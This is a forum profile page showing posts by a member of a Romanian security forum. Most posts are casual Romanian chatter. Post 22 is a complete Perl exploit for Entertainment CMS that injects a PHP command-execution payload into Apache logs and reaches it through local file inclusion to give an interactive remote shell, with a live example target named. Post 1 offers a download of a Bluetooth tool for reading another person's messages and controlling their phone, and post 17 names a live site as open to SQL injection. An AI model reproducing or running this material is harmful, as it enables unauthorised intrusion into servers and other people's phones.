Jump to content

kw3rln

Active Members
  • Posts

    1019
  • Joined

  • Last visited

Everything posted by kw3rln

  1. Once connected to a another phone via bluetooth you can: - read his messages - read his contacts - change profile - play his ringtone even if phone is on silent - play his songs(in his phone) - restart the phone - switch off the phone - restore factory settings - change ringing volume - And here comes the best Call from his phone" it includes all call functions like hold etc. Notes: 1.) When connecting devices use a code 0000 2.) At start of programm on smartphones do not forget to turn on bluetooth before start of the application Download: http://rapidshare.com/files/35224316/Bluetooth.rar Parola: gOzz
  2. video: [url]http://indir.savsak.com/urllistvideo.rar[/url] program: http://indir.savsak.com/URLList.rar
  3. foloseste-ti capu dupa aia linuxu ... dupa extensie sterge "." ala ! nu are ce cauta acolo
  4. kw3rln

    Idee?

    las ca-s buni unii sorinei .. ii provoci ca sa castigi da .. daca castigi confruntarea primesti puncte
  5. http://n00bhackertest.googlepages.com
  6. kw3rln

    q3ndr34m

    welcome dude..enjoy your stay
  7. hmm .. mah iti vand eu unu la 1$ ... numa stai sa plece vecinu de acasa ! taxa de livrare o platesti tu
  8. kw3rln

    Idee?

    dupa o gura de bere si ceva iarba intotdeauna vin ideile..bune sau rele.. m-am gandit ca pe langa sistemul de challengeuri sa facem un fel de war adica un user sa poata selecta o sectiune de la challengeuri sa zicem Securitate Web si sa poate provoca alt user de pe site sa rezolve challengeu ! [apoi un challenge de la categoria respectiva va fi aleasa aleatoriu] Care il castiga dintre cei doi primeste puncte.. sa poti provoca user si prin e-mail daca nu-i inregistrat pe forum e doar o idee.. astept pareri inainte sa scriu scriptul.. alte pareri sunt bine venite !
  9. am citit si eu stirea pe mai multe site-uri de securitate... nush ce sa zic
  10. http://tabara.forumit.ro/2007/home.php stiu n-am ce face ... da mi-ar prinde bine sa invat cate ceva .. sper sa nu fie de aia fara chef de viata si care nu beau ca ma tai io singur eu m-am inscris aproape de 1 saptamana ... am uitat sa va zic si voua
  11. tutoriale si chestii le trimiti la office@rstcenter.com puncte momentan doar bug reports .. poate in curand si challengeuri
  12. http://rstcenter.com/index.php?pagina=tutoriale&selecteaza=tutorial&id=31
  13. nici mie la messenger spy .. snifferu merge fara probleme ! ms de serial
  14. nu vreau sa ma gandesc ce o sa fie vara viitoare sau poate peste cativa ani
  15. kw3rln

    perl codes

    te iubesc zbeng ! desi iubesc grasele [ meserie riscanta ]
  16. frumos frumos .. inca un pik de tuning si e gata
  17. Doamne .. stii ce-ai scris p`acolo? Intelegi ce-ai facut? explica-mi si mie ce face sql injection ala ca-s curios .pe langa ca pagina ii plina de sql injection: http://support.jgaa.com/index.php?cmd=ShowProduct&ID=513' si de unde ai copiat codu la exploit:http://www.vivelinux.org/exploits/2260 macar nu-l pune ca tu l-ai scris si is 9 tabele nu 8 cum ai zis tu.. ai uitat sa numeri si 0
  18. Continutul de alcool din sange: 0.125 % La bere unde is flacoanele de 2L ? nu-i bine .. La sfarsit: Ai probleme cu tastatura? neah... Datele se bazeaza pe ce-am beut ieri
  19. ia murim pe caldura asta .. nici chef sa lucrez nu am
  20. neatza psykid .. demult nu te-am mai vazut.. ! welcome
  21. Daca vreti sa va faceti concurs Faceti un POST unde va puneti creatiile.. nu trebuie un intreg forum pt asa ceva
  22. #!/usr/bin/perl # # Entertainment CMS Remote Command Execution Exploit # Download: [url]http://rapidshare.com/files/39640099/enter-cms.rar[/url] # # Exploit: [url]http://site.com/[/url][path]/custom.php?pagename=[Local File Inclusion]; # Example: [url]http://multimedia.mydlstore.net/custom.php?pagename=teeeeeeeeeeee[/url] # # RST WAS MOVED TO RSTZONE.ORG ! # # Another bug: Entertainment CMS Admin Login Bypass => [url]http://securityreason.com/securityalert/2878[/url] # # Coded by Kw3rLn from Romanian Security Team a.K.A [url]http://RSTZONE.ORG[/url] # Contact: [email]office@rstcenter.com[/email] # use IO::Socket; use LWP::Simple; #ripped from rgod @apache=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../.. /../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); print "[RST] Entertainment CMS Remote Command Execution Exploit\n"; print "[RST] need magic_quotes_gpc = off\n"; print "[RST] c0ded by Kw3rLn from Romanian Security Team [ [url]http://rstcenter.com[/url] ] \n\n"; if (@ARGV < 3) { print "[RST] Usage: xploit.pl [host] [path] [apache_path]\n\n"; print "[RST] Apache Path: \n"; $i = 0; while($apache[$i]) { print "[$i] $apache[$i]\n";$i++;} exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print "[RST] Injecting some code in log files...\n"; $CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n"; print $socket "GET ".$path.$CODE." HTTP/1.1\r\n"; print $socket "User-Agent: ".$CODE."\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); print "[RST] Shell!! write q to exit !\n"; print "[RST] IF not working try another apache path\n\n"; print "[shell] ";$cmd = <STDIN>; while($cmd !~ "q") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n"; print $socket "GET ".$path."custom.php?pagename=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($raspuns = <$socket>) { print $raspuns; } print "[shell] "; $cmd = <STDIN>; } # milw0rm.com [2007-07-24]
  23. super interesant la etherape nu-mi place ca zici ca-s lumini in discoteca .. anyway e asemanator programu
×
×
  • Create New...